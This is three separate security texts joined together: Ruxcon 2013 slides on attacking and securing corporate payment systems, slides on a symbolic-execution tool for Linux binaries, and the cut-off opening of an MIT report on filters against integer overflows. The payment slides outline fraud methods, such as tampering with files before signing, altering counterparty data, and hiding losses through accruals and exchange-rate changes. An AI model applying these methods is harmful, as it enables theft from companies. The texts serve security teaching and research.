Payment Applications Handle Lots of Money. No, Really, Lots of It!
Alberto Revelli (icesurfer) icesurfer@gmail.com
Mark Swift (swifty) swifty@swift.org
Ruxcon 2013

Agenda
✔ Introduction to payment applications
✔ Avenues of attack
✔ Cryptocomedy
✔ How to fix this?
✔ Key takeaways

Introduction
This is an area badly understood and apparently overlooked by the security industry (except, it appears, by clueless morons). The people who ultimately have to be convinced about security care about one thing: money. It's that simple.
Twilight zone / reversing the natural order of things:
• Swifty will do Attack & The Dummy's Guide to Payments
• Ice will do Defence

Context
• Front Office: business management / capture. Not interesting.
• Trade Recs: mess with these areas and you can hide FO/Ops misbehaviour for ages.
• Accounting: P&L (profit and loss), actuals reconciliation, funky accounting methods to reduce tax. Serious scope for mischief here if direct settlements are made from here.
• Payment Gateway: some kind of 'payment gateway' — either manual, a direct banking interface ('EFT', horribly insecure), or FIDES/SWIFT.
• Master Data / PO / Settlements
• Bank / Bureaux: hard. Leave these guys alone or you will get an extradition warrant for a Christmas present.

Landscape
• Seeing the wood for the trees:
  • Massive payments and recs volumes.
  • Acceptable error margins.
  • Human nature: find the explanation you are looking for.
• End-of-month reconciliations don't reconcile ('accruals').
  • Accounts are indecipherable: reversals, accruals, depreciation, loans, amortizations, and other dodgy accounting techniques.
• Computers are never wrong.
  • Who ever does a manual reconciliation check?
• Auditors don't audit.
  • Accountants and auditors look at processes, procedures, and evidenced accounts.
• Security by buzzword. Crypto is magic that fixes everything.
  • Q: How do you secure payments?
  • A: We use military-grade FIPS-certified AES crypto and D/H to verify integrity. We are fully PCI compliant.
The Opportunity
(Diagram: Accounting, Payment Gateway, Settlements, Trade Recs, connected over a message bus)
1) Direct settlements: often broadcast messages (sometimes signed).
2) GUI: often no 2FA for left/right-hand operators.
3) Master data not secured? Create a new counterparty.
4) Payment / recs files written out to 'secure' fileshares.
5) Private key lying around (if it even exists).
6) Cannot mess via the GUI? Go direct to the database.
7) Plaintext memory attacks if you really have to.
8) Server: signing and crypto may happen here. Direct attacks on payment files possible prior to signing.
9) Private key probably ripe for attack, so direct attacks on payment files post signing also possible.

Landscape Issues
MT940 – Statement (relevant lines):
:61:120706D1343280,2NMSCBCP .LEA 36175AFB//4612-0000000   (amount and currency)
:86:BCP.LEA 36175AFB   (unique ref)
:62F:C120709USD9542201,3   (closing balance)

MT101 – Payment File:
{- FIDES ABNAMROXX99 101 02
:30:120622
:21:36175AFB   (unique ref)
:32B:USD1343280,25   (amount and currency)
:50H:/10944563 Sucker Co LTD London   (a/c and name)
:57D:Lloyds Bank PLC Moosley Street Manchester LOYDGB21N78/GB/771935   (pay to this bank)
:59:/897766 Security Services London
:70:023-0000254
:71A:OUR
-}

Show.Me.The.Money

Payment file processing (straight from the manual)
The server process producing the payment file can be processed via a specific server queue. If needed, a specific server queue can be set up per client and per process. The files are automatically stored in a predefined subfolder as defined per the server queue. User access to this folder should be limited to prevent users from accessing and updating the output files. Besides the payment file, a report (bank list) is produced containing the total amount per currency, the number of transactions, and a total sum bank account. The sum bank account is an example of a hash total which can be used to check the integrity of the data. When the payment file is imported in the banking software, the same hash total is shown.
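A hash total of this kind is an arithmetic checksum, not a cryptographic hash, which is exactly what the rest of this talk pokes at. A minimal sketch (the `(account, amount)` file layout is invented for illustration) shows that an attacker who can edit the file can divert money while preserving both the amount total and the hash total:

```python
# A "hash total" as described in the manual: combine each account
# number with its amount, sum, and keep the most significant digits.
# The (account, amount) payment layout here is hypothetical.
def hash_total(payments, digits=22):
    total = sum(acct * amount for acct, amount in payments)
    return str(total)[:digits]

def amount_total(payments):
    return sum(amount for _, amount in payments)

original = [(100, 1000), (300, 1000)]

# Divert 500 from each payment to attacker account 200. Because 200 is
# the weighted average of accounts 100 and 300, both the amount total
# and the "hash total" come out unchanged.
tampered = [(100, 500), (300, 500), (200, 1000)]

assert hash_total(original) == hash_total(tampered)
assert amount_total(original) == amount_total(tampered)
```

Any checksum that is linear in the payment data can be rebalanced this way; an integrity check needs a keyed cryptographic MAC or a signature, not arithmetic.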
Transport of payment file
The transport of the payment file from the Account system subfolder to the banking software can be based on regular file transfer, FTP, or SFTP. With in-house banking software the file is often read directly from the Account subfolder; with external banking software, FTP or SFTP is used. SFTP is advised.

Straight from the manual...

Process Outside T1 Bank

Generate and Send Payments (MT101)

Encrypt payment files:
echo %Password%|gpg --encrypt --batch --passphrase-fd 0 --sign --output "C:\FTP\IT2\Working\delivery.txt.asc" --recipient "Fides Treasury Services Ltd (FTP Channels)" "C:\FTP\IT\Outgoing\*.*"

Upload payment files:
FTP -s:C:\Scripts\FidesITUpload.txt
Contents of FidesITUpload.txt:
open xxx.xx.xx.xx
[removed password]
%Password%
cd /EFT/In
bin
hash
put C:\FTP\IT\Working\*.asc
bye

Copy payment files:
Cmd.exe /C Move /y C:\FTP\IT\Outgoing\*.* C:\FTP\IT\Complete

Download Statements (MT940)
FTP -i -s:C:\Scripts\FidesITDownload.txt
Contents of FidesITDownload.txt:
open xxx.xx.xx.xx
[removed password]
%Password%
cd /ARS
bin
hash
mget *.asc C:\FTP\IT\Incoming\*
bye

Decrypt statements:
echo %Password%|gpg --batch --passphrase-fd 0 --decrypt-files *.ASC

Copy statements to the application server:
Move /y *.txt "\\server.xxx.com\IT\Statements"

Agenda
✔ Introduction to payment applications
✔ Avenues of attack
✔ Cryptocomedy
✔ How to fix this?
✔ Key takeaways

Theft and Avoidance – Basic
Payment file / system attacks:
• Manual payments: steal the bank creds and transfer cash. Recs avoidance more difficult.
• Direct bank interface: as above, or mess with the payment file and then 'correct' the reconciliation statement.
• FIDES/SWIFT: as above; just grab it before it gets encrypted/signed, or after decryption/verification.

Theft and Avoidance – Less Basic
• Attacks via the GUI:
  • 2nd-hand fraud: steal the authentication for left/right-hand officers and set up payments via the system. Made more difficult by 2FA.
  • Change customer payment details (IBAN etc.), then change them back later. Suppression of reconciliation difficult.
  • Internal collusion: tried and tested method.
• Other:
  • Direct changes to the database – master data (counterparty details, maybe payment amounts, etc.).
  • External partners in fraud: 'evil hackers' break in, change the payment amounts, and suppress breaks.
• Note: operator accuracy reports – is it just management who is checking on the most incompetent operators?

Theft and Avoidance – Elite
So stealing money turns out to be a lot easier than imagined. Hiding your tracks long term requires a different skill set... Channel your inner accountant (some examples):
• Accruals – "we'll work it out next month"
• Reversals – "don't worry, the money came back"
• Depreciation – to adjust balances and hide cash out.
• Amortization – "we'll spread it over a few years"
• Loans (3rd party & intercompany): the 'Starbucks' approach.
• Credits (3rd party & intercompany): balance down $1m? Easy, make up a credit from somewhere else!
• Interest rates: increase them and move surplus cash.
• Exchange rates: change them and move surplus cash.
Computers have been around for 150 years. Accountants have been around for thousands.

A Secured Process – T1 Bank
• Accounting tricks to hide cash-out still work.
• Database: how is payment and counterparty data stored prior to payment generation?
• How is the backend/ERP system (payment instructions) secured?
• GUI-based master data attacks should still work.
• On the positive side, GUI payment attacks are now difficult due to 2FA.
More about the crypto management process later...

Agenda
✔ Introduction to payment applications
✔ Avenues of attack
✔ Cryptocomedy
✔ How to fix this?
✔ Key takeaways

Key Management? What's That?

Hashing? Yes, We Do Hash
1. Multiply each account number by the respective amount
2. Sum all results
3.
Take up to the 22 most significant digits
Finance Systems Specialist: "It is easy to add a hash total to the current flat file produced from SAP. We do it most of the time for bank transfer files. It is difficult to crack a hash total solution."

Encryption? Yes, That Too!
Finance Systems Specialist: "Sure we encrypt the payment information! Here's what we do..."
1. Generate a very long key
2. For each payment line x, we calculate (key + x)
3. We then ...
* Published in 1553 and considered unbreakable. Publicly broken by Charles Babbage in 1854.

Agenda
✔ Introduction to payment applications
✔ Avenues of attack
✔ Cryptocomedy
✔ How to fix this?
✔ A few caveats
✔ Key takeaways

So, Let's Fix This Sucker
(Accounting → Payment Gateway → Settlements / Trade Recs)
We focus on this bit, because:
- this is where there is the opportunity to make arbitrary payments;
- there is the opportunity to cover the traces of those payments;
- before this step, any settlement request has to be against an existing counterparty pre-set-up in the system.

A Real Example of This Process
• User A creates the payment instruction
• User B approves it
• User C releases it
• Finally, User D finalizes it into an MT101 file
"Hey, four people need to control this, what could possibly go wrong?"

Payments Are NOT Immutable Artifacts
When a user creates or approves a payment, all he does is write some rows in a DB. "DBAs do not understand commodities markets" is not a good defence strategy.

Really, They Are NOT!
In most cases, once the MT101 is created it is stored as a text file in a (shared) folder, waiting for Dude E to encrypt it for transmission. What could possibly go wrong?

Basic, Obvious Idea: Sign Each Step
• User A creates the payment... the payment is signed with his private key.
• User B approves it... check the first signature, then re-sign.
• User C re-approves it... check both previous signatures, then re-sign.
You got the idea...
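The sign-each-step chain can be sketched in a few lines. Per-user HMAC secrets stand in here for the per-user private keys (which in the real design live in an HSM); the user names and payment layout are made up for illustration:

```python
import hashlib
import hmac
import json

# Stand-ins for per-user private keys held in the HSM (hypothetical).
KEYS = {"creator": b"key-A", "approver1": b"key-B", "approver2": b"key-C"}

def sign(user, payment, prior_sigs):
    # Each signature covers the payment AND all earlier signatures, so
    # approvals are chained: you cannot re-approve altered data.
    msg = json.dumps([payment, prior_sigs], sort_keys=True).encode()
    return hmac.new(KEYS[user], msg, hashlib.sha256).hexdigest()

def verify(user, payment, prior_sigs, sig):
    return hmac.compare_digest(sign(user, payment, prior_sigs), sig)

payment = {"beneficiary": "Sucker Co LTD", "amount": "USD1343280,25"}
s1 = sign("creator", payment, [])              # User A creates
assert verify("creator", payment, [], s1)      # User B checks...
s2 = sign("approver1", payment, [s1])          # ...then re-signs
s3 = sign("approver2", payment, [s1, s2])      # User C likewise

# A DBA who edits the row now invalidates the whole chain:
payment["beneficiary"] = "Evil Co"
assert not verify("creator", payment, [], s1)
```

With real asymmetric keys the verifier would hold only public keys; the chaining logic is the same.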
Just Add a Few Columns, Right?
Payment proposal = payment details plus (UserID, Signature) columns for the "Creator", the "First Approver", and the "Second Approver".

Ok, It's a Bit More Complicated
An MT101 is a tree, not a row:
• GeneralInfo: Name, Recipient, ...
• MT101Info: AccountServicingInstitution, Authorisation, InstructionParty, MessageIndexingTotal, RequestedExecutionDate, OrderingCustomer, ...
• MT101TransactionDetails: AccountWithInstitution, Beneficiary, ChargesAccount, CurrencyTransactionAmount, ...
Each of these rows can be signed by a different combo of people.

Complicated, and Somewhat Overlapping
One MT101 carries MT101Info plus several MT101TransactionDetails blocks, each with its own signature.

Who Will Sign Anyway?
Payment App + DBMS → Crypto Web Service → Active Directory / RSA → HSM subnet (vShield) with HSMs in Calgary, London and Singapore.

About the HSM Guys...
• A Hardware Security Module (FIPS 140-2)
• Intrusion-resistant, tamper-evident hardware
• Keys in hardware
• PKCS#11, Microsoft CAPI, CNG, JCA/JCE, OpenSSL
• PRNG, symmetric and asymmetric key pair generation, encryption, decryption, digital signing

Playing with HSMs Is Fun!
• Remote login with USB token and PIN
• Tamper-proof
• Buttons are spaced for users who are likely to wear gloves (e.g. soldiers in tanks)

Two Apps and Lots of Groups
• Payment App (Creators, Approvers, Finalizers) talks to the Payment Service for payment signing.
• Admin App (Admins): key–user association (AD admins), group–user association, HSM partition management (HSM admins).

Sample payment record (screenshot residue, partial): authentication data (AD, RSA); PIL-12041210000; 27.03.12; Fides; 150 USD; CRESCHZZ80A; CH05 0483 5143 0870 9100 0; Big Co, Inc., PO Box 30, CH-1101 Bienne/Biel; CREDSUISS CHF A/C 1430870-91; 7 Quai des Bergues, 1211 Geneva.
Sign This, B*tch!

Step 1: Payment Creation — the Payment App submits the XML to the Crypto Web Service; Sign1 is attached.
Step 2: First Approval — Sign2 is attached over the XML plus Sign1.
Step 3: Second Approval — Sign3 is attached over the XML plus Sign1 and Sign2.
Step 4: Finalization — the XML (Sign1, Sign2, Sign3) becomes an MT101 carrying the payer's signature, then Encr(FIDES).

WOW! This Might Work!
• DBAs cannot modify payment data.
• The file is protected at the moment of creation.
• Adding yourself to an AD group is not enough: you also need a CryptoService admin to generate your key.
• Job done?

It Is Easy to Get Things Wrong
...Oooops! MT101 != XML :))))

Quis Custodiet Ipsos Custodes?*
1) Wait for the payment finalization request
2) Check the signatures (we don't want others to cheat at the same time)
3) Change the payment beneficiary
4) Sign + encrypt
5) PROFIT!!!
* Who watches the watchmen?
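A compromised signing service like the one above is caught if the application independently rebuilds the MT101 from its own copy of the approved data and checks the returned signature against that file. A sketch, with HMAC standing in for the payer's asymmetric signature and all data invented:

```python
import hashlib
import hmac

PAYER_KEY = b"payer-signing-key"  # hypothetical; really in the HSM

def cs_sign(mt101: bytes) -> str:
    # Crypto service: verify the workflow signatures (elided here),
    # build an MT101, sign it, and return ONLY the signature.
    return hmac.new(PAYER_KEY, mt101, hashlib.sha256).hexdigest()

def app_finalize(local_mt101: bytes, sig: str) -> bytes:
    # Application: build its own MT101 from the signed XML and check
    # the returned signature against THAT before encrypting/sending,
    # so a rogue service cannot silently swap the beneficiary.
    expect = hmac.new(PAYER_KEY, local_mt101, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expect, sig):
        raise ValueError("signature does not match locally built MT101")
    return local_mt101  # would now be GPG-encrypted for the bank

good = b":32B:USD1343280,25 :59:/897766 Security Services"
evil = b":32B:USD1343280,25 :59:/666 Evil Hacker Co"
assert app_finalize(good, cs_sign(good)) == good   # honest service
try:
    app_finalize(good, cs_sign(evil))              # rogue service
except ValueError:
    pass                                           # tampering detected
else:
    raise AssertionError("tampered MT101 was accepted")
```

Neither side can unilaterally produce an accepted file: that is the dual control described next.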
Phase 4: Corrected — XML (Sign1, Sign2, Sign3) → MT101 + payer's signature → Encr(FIDES), with the MT101 now checked by the application.

Dual Control! Always!
1) The application submits the XML
2) The CS verifies the signatures
3) The CS generates an MT101 and signs it
4) The CS returns the signature
5) The application generates another MT101 and verifies that the signature corresponds
6) The application calls GPG with the following parameters: the MT101, the signature, and the recipient's public key
7) The resulting file is finally sent

Agenda
✔ Introduction to payment applications
✔ Avenues of attack
✔ Cryptocomedy
✔ How to fix this?
✔ Key takeaways

A Few Takeaways
1) Payment apps are everywhere and handle big bucks, but they are generally "secured" by clueless people
2) Financial system vendors seem to be utterly clueless about this
3) Most payment apps out there are likely to be horribly vulnerable
4) Why don't we hear about the thefts?

More Takeaways
5) It can be a fun problem to solve!
6) There are obviously a whole bunch of other intricacies, but you get the main idea
7) The devil is in the details

Questions?

----------------------------------------------------------------------

Symbolic Execution of Linux Binaries
A tool for the ...

About Symbolic Execution
● Dynamically explore all program branches.
● Inputs are considered symbolic variables.
● Symbols remain uninstantiated and become constrained at execution time.
● At a conditional branch operating on symbolic terms, the execution is forked.
● Each feasible branch is taken, and the appropriate constraints logged.

Input space >> number of paths:
int main() {
    int val;
    read(STDIN, &val, sizeof(val));
    if (val > 0)
        if (val < 100)
            do_something();
        else
            do_something_else();
}

This is used for:
● Test generation and bug hunting.
● Reasoning about reachability.
● Worst-Case Execution Time Analysis.
● Comparing different versions of a function.
● Deobfuscation, malware analysis.
● AEG: Automatic Exploit Generation. Whaat?!

State of the art
● Lots of academic papers:
  ○ 2008-12-OSDI-KLEE
  ○ Unleashing Mayhem on Binary Code
● Several implementations:
  ○ SymDroid, Cloud9, Pex, jCUTE, Java PathFinder, KLEE, S2E, FuzzBALL, Mayhem, CBASS
● Only a few work on binaries:
  ○ libVEX / IL based
  ○ QEMU based

Our aim
● Emulate Intel x86-64 machine code symbolically.
● Load ELF executables.
● Synthesize any process state as starting point.
● The final code should be readable and easy to extend.
● Use as few dependencies as possible: pyelftools, distorm3 and z3.
● Analysis state can be saved and restored.
● Workload can be distributed (dispy).

Basic architecture

Instruction frequency in GNU libc
● 336 different opcodes
● 160218 total instructions
● 37% of them are MOV or ADD
● currently 185 instructions implemented

CPU
● Based on the distorm3 Decompose interface.
● Most instructions are very simple, e.g.:

@instruction
def DEC(cpu, dest):
    res = dest.write(dest.read() - 1)
    # Affected flags: o..szapc
    cpu.calculateFlags('DEC', dest.size, res)

Memory
class Memory:
    def mprotect(self, start, size, perms): ...
    def munmap(self, start, size): ...
    def mmap(self, addr, size, perms): ...
    def putchar(self, addr, data): ...
    def getchar(self, addr): ...

Operating system model (Linux)
class Linux:
    def exe(self, filename, argv=[], envp=[]): ...
    def syscall(self, cpu): ...
    def sys_open(self, cpu, buf, flags, mode): ...
    def sys_read(self, cpu, fd, buf, count): ...
    def sys_write(self, cpu, fd, buf, size): ...
    def sys_close(self, cpu, fd): ...
    def sys_brk(self, cpu, brk): ...

Symbols and SMT solver
class Solver:
    def getallvalues(self, x, maxcnt=30): ...
    def minmax(self, x, iters=10000): ...
    def check(self): ...
    def add(self, constraint): ...
    # Symbol factory
    def mkArray(self, size, name): ...
    def mkBool(self, name): ...
    def mkBitVec(self, size, name): ...
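The fork-at-a-branch idea from the opening slides can be shown in miniature on the toy program above. A real engine asks the SMT solver whether each constraint set is satisfiable; this self-contained sketch brute-forces a small integer range as a stand-in for that check:

```python
# Miniature symbolic exploration of:
#   if (val > 0) { if (val < 100) do_something();
#                  else do_something_else(); }
# Constraints are Python predicates over the symbolic input `val`.

def feasible(constraints, lo=-200, hi=200):
    # Stand-in for an SMT satisfiability check: brute-force a range.
    return any(all(c(v) for c in constraints) for v in range(lo, hi + 1))

def explore():
    paths = []
    taken = (lambda v: v > 0,)           # fork 1: branch taken
    fallthrough = (lambda v: v <= 0,)    # fork 1: branch not taken
    if feasible(taken):                  # nested fork on the taken side
        for label, c2 in [("do_something", lambda v: v < 100),
                          ("do_something_else", lambda v: v >= 100)]:
            cs = taken + (c2,)
            if feasible(cs):
                paths.append((label, cs))
    if feasible(fallthrough):
        paths.append(("skip_both", fallthrough))
    return paths

for label, cs in explore():
    example = next(v for v in range(-200, 201) if all(c(v) for c in cs))
    print(label, example)
# → do_something 1
#   do_something_else 100
#   skip_both -200
```

Despite roughly 2^32 possible inputs, only three feasible paths exist, and each yields a concrete test input — the "input space >> number of paths" point.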
Operation over symbols is almost transparent:
>>> from smtlibv2 import *
>>> s = Solver()
>>> a = s.mkBitVec(32)
>>> b = s.mkBitVec(32)
>>> s.add(a + 2*b > 100)
>>> s.check()
'sat'
>>> s.getvalue(a), s.getvalue(b)
(101, 0)

The glue: basic initialization
1. Make Solver, Memory, Cpu and Linux objects.
2. Load the ELF binary into Memory, initialize CPU registers, initialize the stack.

solver = Solver()
mem = SMemory(solver, bits, 12)
cpu = Cpu(mem, arch)
linux = SLinux(solver, [cpu], mem, ...)
linux.exe("./my_test", argv=[], env=[])

The glue: basic analysis loop
states = ['init.pkl']
while len(states) > 0:
    linux = load(states.pop())
    while linux.running:
        linux.execute()
        if isinstance(linux.cpu.PC, Symbol):
            vals = solver.getallvalues(linux.cpu.PC)
            # -- generate a state for each value --
            break

Micro demo
python system.py -h
usage: system.py [-h] [-sym SYM] [-stdin STDIN] [-stdout STDOUT] [-stderr STDERR] [-env ENV] PROGRAM ...
python system.py -sym stdin my_prog
stdin: PDF-1.2++++++++++++++++++++++++++++++

Symbolic inputs
We need to mark which part of the environment is symbolic:
● STDIN: a file, partially symbolic. Symbols are marked with "+".
● STDOUT and STDERR are placeholders.
● ARGV and ENVP can be symbolic.

A toy example
int main(int argc, char* argv[], char* envp[]) {
    char buffer[0x100] = {0};
    read(0, buffer, 0x100);
    if (strcmp(buffer, "ZARAZA") == 0)
        printf("Message: ZARAZA!\n");
    else
        printf("Message: Not Found!\n");
    return 0;
}

Conclusions, future work
● Push all known optimizations: solver cache, implied values, redundant state elimination, constraint independence, KLEE-like counterexample cache, symbol simplification.
● Add more CPU instructions (FPU, SIMD).
● Improve the Linux model, add networking.
● Implement an OSX loader and OS model.
● https://github.com/feliam/pysymemu

Gracias.
Contacto: feliam@binamuse.com

----------------------------------------------------------------------

MIT-CSAIL-TR-2013-018
August 6, 2013
Computer Science and Artificial Intelligence Laboratory Technical Report
Massachusetts Institute of Technology, Cambridge, MA 02139 USA — www.csail.mit.edu

Sound Input Filter Generation for Integer Overflow Errors
Fan Long, Stelios Sidiroglou-Douskos, Deokhwan Kim, Martin Rinard
MIT CSAIL
{fanl, stelios, dkim, rinard}@csail.mit.edu

Abstract
We present a system, SIFT, for generating input filters that nullify integer overflow errors associated with critical program sites such as memory allocation or block copy sites. SIFT uses a static program analysis to generate filters that discard inputs that may trigger integer overflow errors in the computations of the sizes of allocated memory blocks or the number of copied bytes in block copy operations. The generated filters are sound — if an input passes the filter, it will not trigger an integer overflow error for any analyzed site.
Our results show that SIFT successfully analyzes (and therefore generates sound input filters for) 52 out of 58 memory allocation and block memory copy sites in analyzed input processing modules from five applications (VLC, Dillo, Swfdec, Swftools, and GIMP). These nullified errors include six known integer overflow vulnerabilities. Our results also show that applying these filters to 62895 real-world inputs produces no false positives. The analysis and filter generation times are all less than a second.

1. Introduction
Many security exploits target software errors in deployed applications. One approach to nullifying vulnerabilities is to deploy input filters that discard inputs that may trigger the errors.
We present a new static analysis technique and implemented system, SIFT, for automatically generating filters that discard inputs that may trigger integer overflow errors at analyzed memory allocation and block copy sites. We focus on this problem, in part, because of its practical importance. Because integer overflows may enable code injection or other attacks, they are an important source of security vulnerabilities [22, 29, 32]. Unlike all previous techniques of which we are aware, SIFT is sound — if an input passes the filter, it will not trigger an overflow error at any analyzed site.

1.1 Previous Filter Generation Systems
Standard filter generation systems start with an input that triggers an error [8–10, 24, 33]. They next use the input to generate an execution trace and discover the path the program takes to the error. They then use a forward symbolic execution on the discovered path (and, in some cases, heuristically related paths) to derive a vulnerability signature — a boolean condition that the input must satisfy to follow the same execution path through the program to trigger the same error. The generated filter discards inputs that satisfy the vulnerability signature. Because other unconsidered paths to the error may exist, these techniques are unsound (i.e., the filter may miss inputs that exploit the error).
It is also possible to start with a potentially vulnerable site and use a weakest precondition analysis to obtain an input filter for that site. To our knowledge, the only previous technique that uses this approach [4] is unsound in that 1) it uses loop unrolling to eliminate loops and therefore analyzes only a subset of the possible execution paths and 2) it does not specify a technique for dealing with potentially aliased values. As is standard, the generated filter incorporates checks from conditional statements along the analyzed execution paths.
The goal is to avoid filtering potentially problematic inputs that the program would (because of safety checks at conditionals along the execution path) process correctly. As a result, the generated input filters perform a substantial (between 10^6 and 10^10) number of operations.

1.2 SIFT
SIFT starts with a set of critical expressions from memory allocation and block copy sites. These expressions control the sizes of allocated or copied memory blocks at these sites. SIFT then uses an interprocedural, demand-driven, weakest precondition static analysis to propagate the critical expression backwards against the control flow. The result is a symbolic condition that captures all expressions that the application may evaluate (in any execution) to obtain the values of critical expressions. The free variables in the symbolic condition represent the values of input fields. In effect, the symbolic condition captures all of the possible computations that the program may perform on the input fields to obtain the values of critical expressions. Given an input, the generated input filter evaluates this condition over the corresponding input fields to discard inputs that may cause an overflow.

Figure 1. The SIFT architecture. (Annotated modules feed critical site identification and the static analysis, which produces symbolic conditions; the filter generator emits a property checker that either drops an incoming input and generates a report, or passes it to the application.)

A key challenge is that, to successfully extract effective symbolic conditions, the analysis must reason precisely about interprocedural computations that use pointers to compute and manipulate values derived from input fields.
Our analysis meets this challenge by deploying a novel combination of techniques including 1) a novel interprocedural weakest precondition analysis that works with symbolic representations of input fields and values accessed via pointers (including input fields read in loops and values accessed via pointers in loops) and 2) an alias analysis that ensures that the derived symbolic condition correctly characterizes the values that the program computes.
Another key challenge is obtaining loop invariants that enable the analysis to precisely characterize how loops transform the propagated symbolic conditions. Our analysis meets this challenge with a novel symbolic expression normalization algorithm that enables the fixed point analysis to terminate unless it attempts to compute a symbolic value that depends on a statically unbounded number of values computed in different loop iterations (see Section 3.2).
• Sound Filters: Because SIFT takes all paths to analyzed memory allocation and block copy sites into account, it generates sound filters — if an input passes the filter, it will not trigger an overflow in the evaluation of any critical expression (including the evaluation of intermediate expressions at distant program points that contribute to the value of the critical expression).¹
• Efficient Filters: Unlike standard techniques, SIFT incorporates no checks from the program's conditional statements and works only with arithmetic expressions that contribute directly to the values of the critical expressions. It therefore generates much more efficient filters than standard techniques (SIFT's filters perform tens of operations as opposed to tens of thousands or more). Indeed, our experimental results show that, in contrast to standard filters, SIFT's filters spend essentially all of their time reading the input (as opposed to checking if the input may trigger an overflow error).
• Accurate Filters: Our experimental results show that, empirically, ignoring execution path constraints results in no loss of accuracy. Specifically, we tested our generated filters on 62895 real-world inputs for six benchmark applications and found no false positives (incorrectly filtered inputs that the program would have processed correctly). We attribute this potentially counterintuitive result to the fact that standard integer data types usually contain enough bits to represent the memory allocation sizes and block copy lengths that benign inputs typically elicit.

¹ As is standard in the field, SIFT uses an alias analysis that is designed to work with programs that do not access uninitialized or out-of-bounds memory. Our analysis therefore comes with the following soundness guarantee. If an input passes the filter for a given critical expression e, the input field annotations are correct (see Section 3.4), and the program has not yet accessed uninitialized or out-of-bounds memory when the program computes a value of e, then no integer overflow occurs during the evaluation of e (including the evaluations of intermediate expressions that contribute to the final value of the critical expression).

1.3 SIFT Usage Model
Figure 1 presents the architecture of SIFT. The architecture is designed to support the following usage model:
Module Identification. Starting with an application that is designed to process inputs presented in one or more input formats, the developer identifies the modules within the application that process inputs of interest. SIFT will analyze these modules to generate an input filter for the inputs that these modules process.
Input Statement Annotation.
The developer annotates the relevant input statements in the source code of the modules to identify the input field that each input statement reads.
Critical Site Identification. SIFT scans the modules to find all critical sites (currently, memory allocation and block copy sites). Each critical site has a critical expression that determines the size of the allocated or copied block of memory. The generated input filter will discard inputs that may trigger an integer overflow error during the computation of the value of the critical expression.
Static Analysis. For each critical expression, SIFT uses a demand-driven backwards static program analysis to automatically derive the corresponding symbolic condition. Each conjunct expression in this condition specifies, as a function of the input fields, how the value of the critical expression is computed along one of the program paths to the corresponding critical site.
Input Parser Acquisition. The developer obtains (typically from open-source repositories such as Hachoir [1]) a parser for the desired input format. This parser groups the input bit stream into input fields, then makes these fields available via a standard API.
Filter Generation. SIFT uses the input parser and symbolic conditions to automatically generate the input filter. When presented with an input, the filter reads the fields of the input and, for each symbolic expression in the conditions, determines if an integer overflow may occur when the expression is evaluated. If so, the filter discards the input. Otherwise, it passes the input along to the application. The generated filters can be deployed anywhere along the path from the input source to the application that ultimately processes the input.
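In spirit, the check a generated filter performs is small: evaluate each symbolic condition over the parsed input fields and flag any intermediate value that leaves the machine-integer range. A sketch of that idea — the condition used here (width × height × 4) is a made-up stand-in, not one of SIFT's actually derived conditions:

```python
# Evaluate a size computation over parsed input fields, step by step,
# and report whether any intermediate leaves the 32-bit int range.
INT32_MIN, INT32_MAX = -2**31, 2**31 - 1

def may_overflow(factors):
    acc = 1
    for f in factors:
        acc *= f  # exact arithmetic, then a representability check
        if not (INT32_MIN <= acc <= INT32_MAX):
            return True
    return False

def accept(fields):
    # The filter discards inputs whose size computation may overflow;
    # the field names and the condition itself are hypothetical.
    return not may_overflow([fields["width"], fields["height"], 4])

assert accept({"width": 640, "height": 480})            # benign: pass
assert not accept({"width": 0xFFFF, "height": 0xFFFF})  # discarded
```

This is why such filters run in tens of operations: they evaluate only the arithmetic that feeds the critical expression, with no path conditions.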
1.4 Experimental Results
We used SIFT to generate input filters for modules in five real-world applications: VLC 0.8.6h (a network media player), Dillo 2.1 (a lightweight web browser), Swfdec 0.5.5 (a flash video player), Swftools 0.9.1 (SWF manipulation and generation utilities), and GIMP 2.8.0 (an image manipulation application). Together, the analyzed modules contain 58 critical memory allocation and block copy sites. SIFT successfully generated filters for 52 of these 58 critical sites (SIFT's static analysis was unable to derive symbolic conditions for the remaining six critical sites; see Section 5.2 for more details). These applications contain six integer overflow vulnerabilities at their critical sites. SIFT's filters nullify all of these vulnerabilities.
Analysis and Filter Generation Time. We configured SIFT to analyze all critical sites in the analyzed modules, then generate a single, high-performance composite filter that checks for integer overflow errors at all of the sites. The maximum time required to analyze all of the sites and generate the composite filter was less than a second for each benchmark application.
False Positive Evaluation. We used a web crawler to obtain a set of at least 6000 real-world inputs for each application (for a total of 62895 input files). We found no false positives — the corresponding composite filters accept all of the input files in this test set.
Filter Performance. We measured the composite filter execution time for each of the 62895 input files in our test set. The average time required to read and filter each input was at most 16 milliseconds, with this time dominated by the time required to read in the input file.

1.5 Contributions
This paper makes the following contributions:
• SIFT: We present SIFT, a sound filter generation system for nullifying integer overflow vulnerabilities.
SIFT scans modules to find critical memory allocation and block copy sites, statically analyzes the code to automatically derive symbolic conditions that characterize how the application may compute the sizes of the allocated or copied memory blocks, and generates input filters that discard inputs that may trigger integer overflow errors in the evaluation of these expressions. In comparison with previous filter generation techniques, SIFT is sound and generates efficient and empirically precise filters.
• Static Analysis: We present a new static analysis that automatically derives symbolic conditions that capture, as a function of the input fields, how the integer values of critical expressions are computed along the various possible execution paths to the corresponding critical site. Key elements of this static analysis include 1) a precise backwards symbolic analysis that soundly and accurately reasons about symbolic conditions in the face of instructions that use pointers to load and store computed values and 2) a novel normalization procedure that enables the analysis to effectively synthesize symbolic loop invariants.
• Experimental Results: We present experimental results that illustrate the practical viability of our approach in protecting applications against integer overflow vulnerabilities at memory allocation and block copy sites.
The remainder of the paper is organized as follows. Section 2 presents an example that illustrates how SIFT works. Section 3 presents the core SIFT static analysis for C programs. Section 4 presents the formalization of the static analysis and discusses the soundness of the analysis. Section 5 presents the experimental results. Section 6 presents related work. We conclude in Section 7.

2. Example
We next present an example that illustrates how SIFT nullifies an integer overflow vulnerability in Swfdec 0.5.5, an open source shockwave flash player. Figure 2 presents (simplified) source code from Swfdec.
 1 int jpeg_decoder_decode(JpegDecoder *dec) {
 2   ...
 3   jpeg_decoder_start_of_frame(dec, ...);
 4   jpeg_decoder_init_decoder(dec);
 5   ...
 6 }
 7 void jpeg_decoder_start_of_frame(JpegDecoder *dec) {
 8   ...
 9   dec->height = jpeg_bits_get_u16_be(bits);
10   /* dec->height = SIFT_input("jpeg_height", 16); */
11   dec->width = jpeg_bits_get_u16_be(bits);
12   /* dec->width = SIFT_input("jpeg_width", 16); */
13   for (i = 0; i < dec->n_components; i++) {
14     dec->components[i].h_sample = getbits(bits, 4);
